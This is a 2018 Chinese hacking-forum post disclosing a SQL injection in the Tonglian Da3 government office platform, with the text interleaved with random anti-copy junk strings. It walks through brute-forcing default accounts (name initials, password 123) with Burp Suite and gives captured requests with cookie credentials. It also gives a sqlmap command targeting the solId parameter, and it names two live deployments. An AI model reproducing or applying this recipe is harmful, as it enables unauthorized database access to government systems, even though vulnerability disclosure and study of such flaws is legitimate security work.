找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1358|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ u5 s. ` Q) F F( a
2 P: \6 N k8 f# L; `1 J3 P

- q: @. _0 G9 [3 k$ F! R

+ Q' m4 m J+ | 平台简介:) N% V2 \, I. ^! C/ ?4 V

& D& K- v' k- r+ u+ u

7 f: B- I% ^4 U" n. x4 C. a& a  $ q3 {6 V* j4 U# z1 j9 Z# q

% P. b% b+ c8 I

. Y# q5 S" j) o' C 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. W3 s: X D* ?% a1 W |8 w% X) J: _ 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
8 [5 S+ j- Z& D7 t0 l* [同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 S, {; v% E) l7 r0 _' {8 P, |; y

2 j5 O) ~( x! G* t& N+ K

) |, Q& ]0 |& K: a7 e n   / j" {, Y8 [6 G+ ?1 [0 Z. k" h

* d9 |9 ?' K3 F+ ]

/ P R; [/ O% o, x 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:, S! T% m- \. S/ ^/ v

8 c# B' I* e6 P" B% C" T

4 q3 ~1 Q+ y9 d! f0 `3 P   & a3 {* s! e7 `, Q: o0 V

4 d5 l1 G+ [7 g, y: X! v

- m3 R2 f; T+ E7 g http://1.1.1.1:7197/cap-aco/#(案例2-)- r8 C$ c% Z. s& ]# y q$ Y

) C, w8 X- b" B# S3 }1 g

: ]! e5 t; @) |# _ http://www.XXOO.com (案例1-官网网站)0 H$ U/ L/ |( R: P

$ {" s! M0 c% X+ _, F* C

; ~2 ?/ n4 W# R   ) h4 x$ w2 p: a! ?5 U

- @8 ?$ o' W& H& B

3 g' W v2 M) \! ?* ~ 漏洞详情: , P! c2 O6 _$ c9 b; F% g

( _1 n7 S: E6 n

+ q/ l# p) _" D! _  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试" P5 _ Y, M3 ]! ^( b9 O. R2 ^

6 `0 I/ n$ a5 A. o4 W

" H q2 @. E+ z+ \      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: # H6 r2 @$ W3 h5 Q

9 P2 F7 w0 K- O! O+ u

2 m/ g, k7 o, _8 u  , c5 W& X6 [6 I" p1 L

7 S& x& }- f' r0 [

2 D( d6 D j) G; ~, _( L6 y6 y   ) L" U- A; u/ d: N

+ M/ Y8 J9 H% ~2 h3 o- s7 O" y! q8 U$ D& w

9 M# R2 N. K+ l: ~1 x! q3 H status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: & H' L$ m' t* [$ Y

9 u9 h! w& @, H$ ~% S/ L, t

1 m7 v+ P9 v) p4 Z! p3 o8 g 1、案例1-官方网站 + A4 j$ w! ? ~' U+ U6 U

3 P R( F0 z- J6 {1 C5 U) H, E

3 u. I1 [6 H K& T GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 ) C l+ t! C) {. j" g4 T

1 i s6 e, A: ~ |; ?2 d

! l1 k5 X0 f' \: v Host: www.XXOO.com ) A, D) W0 D5 T0 B6 N9 D

9 U) n( g2 R% o: x

. q6 H5 B% Y, ]: Q. H' j) n Proxy-Connection: Keep-Alive / |6 c: {3 C' @- ~& c/ S$ T* D* M

w7 l) _( q& U

& I8 p. r; a4 s0 E4 _ Accept: application/json, text/javascript, */*; q=0.013 ^/ l7 O1 Z: U u {) a3 ?

$ M# p# C" P3 T8 i8 {6 }

' ~+ ?7 X4 B- e8 E/ z Accept-Language: zh-CN ; N, A+ [. t3 n( r

$ O- Q# d A* b" D0 ?

) V# {) _& w' C% t0 N" M Content-Type: application/json 5 a# w( I3 a8 L2 m9 V, K$ s

) H" m3 C& ]% I+ T- d

: ^) }" e9 T v3 @ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko% ~( P- P5 E: H& a# ?3 R

; ]) V7 p+ q0 F0 P6 i! H+ q

) |& {9 P+ \2 [& w X-Requested-With: XMLHttpRequest) {* }9 Q. v0 ~

8 r+ g% D# K5 e3 o( A

- o8 T, o: `' H1 Z+ v& w: W, g Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 * I# Z) G- d: g: `3 ?& M% j# J4 y

_" w- h: M% }" w/ F

. Z/ C# h1 n9 H" o' c Accept-Encoding: gzip, deflate, sdch+ y2 R; X9 I+ Q/ F/ l- Z1 L+ z; p# y

5 D }+ ~! r% Z2 I k" Y

1 M- }' z& i; H- C, f n* f& _ Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e , g9 o$ M7 p9 M0 g. `, i- ~# N

- Q0 p; z4 L, r

a5 |) W, w% n9 t4 f- w7 b 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:) m. R7 H4 @% T( C* h7 H

. P" S7 A8 E. z. U

% I+ Y& E3 H& w. S" c% ^/ ]  . W2 C# t6 B. G: Q+ q% h/ U( U

+ {/ A8 |* U$ l' G: g- d' ]: H

" N% j7 O8 \8 W9 V. B   $ {! m" U' q8 p$ {1 H

9 M/ { k: U7 |. u+ n7 E" d

1 o5 Q% b6 G$ G0 J& Y  2 T, O0 u: ]# ~7 j; E# ] z9 \2 n3 n) {

5 }6 w" U+ n% S' {

+ u+ T7 _, J: M5 [! K  * {. Y( G5 \( w$ n/ C; k

4 p; B! v1 Q# E- ?6 b7 r% a

3 W; f. x2 J# r/ \  $ f4 F; ?2 D( u3 \8 l) l, I

5 T9 C4 u: F( Z% I$ T$ W' G' y8 ^

$ B; t$ P2 E7 x: X# L A 2、案例2-某天河云平台 0 i! n9 _9 N2 F* L5 U

* I" I8 j2 c: \5 ^( R! U

' ^9 o1 z8 `( L4 ~4 a1 s2 o v GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 * v& B/ O+ C& _. o, U

7 F4 V# C' ?' l: | c& w8 _" v

6 ]; L! O, _8 Q M$ K Host: 1.1.1.:7197 0 B0 K& I) ]; X( c2 }7 g1 v+ y

2 C7 T: g9 A; L3 k

( _/ c; H& [, q/ B Accept: application/json, text/javascript, */*; q=0.01 " U4 C* ~% g4 c# s8 u7 [( y

4 X- y5 p1 x. w) X7 x

$ q6 S, T6 B, y! B X-Requested-With: XMLHttpRequest/ w" D' C0 B. w" k% @7 C

' {; _5 F9 F' A! | \& V

- r' |- |5 z( h8 [5 K1 j User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 H: T% L$ P, d/ Z4 P: z3 p* x1 A

" U8 j; X6 C1 G8 i( B

+ p3 @5 J( u y& o Content-Type: application/json5 N4 T" K5 m# {; J, i

: U6 g6 y/ j( J- z" n/ m: y

1 c8 e# V& Y, q Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 5 }( O, X* e$ s# t" X6 W* y

7 Q' u# i" y. y( A5 T

6 N3 |3 K+ r) a' x+ T2 ?% }1 W Accept-Language: zh-CN,zh;q=0.8* R/ r$ `$ g+ K

' W( f) N7 z; z- x4 u7 K8 b* [

& R4 n% R" T: i+ g- j k8 q- t9 C Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1. O# O( J! v+ B: O7 ]; ~

8 n! \, r% P$ k

. {( {& g% q( N% }) Y5 Z% C Connection: close/ r- q3 h- j6 W) K( K

1 @9 a* u4 D, b6 {4 j; h9 U

3 {1 S. K; K, X/ X+ n 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: ! p6 ?7 Z# g4 \! g& e

* W& ~! B3 B; h, A+ L

: C# O8 l# p7 ^   , W2 f- r5 A. @ e- r8 k

M# E1 M2 s/ y4 ^" d T

7 F2 t/ O0 d2 ?0 d& O# ?& ]$ x( t% y
: @! _, ^ @6 j# i2 ?

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表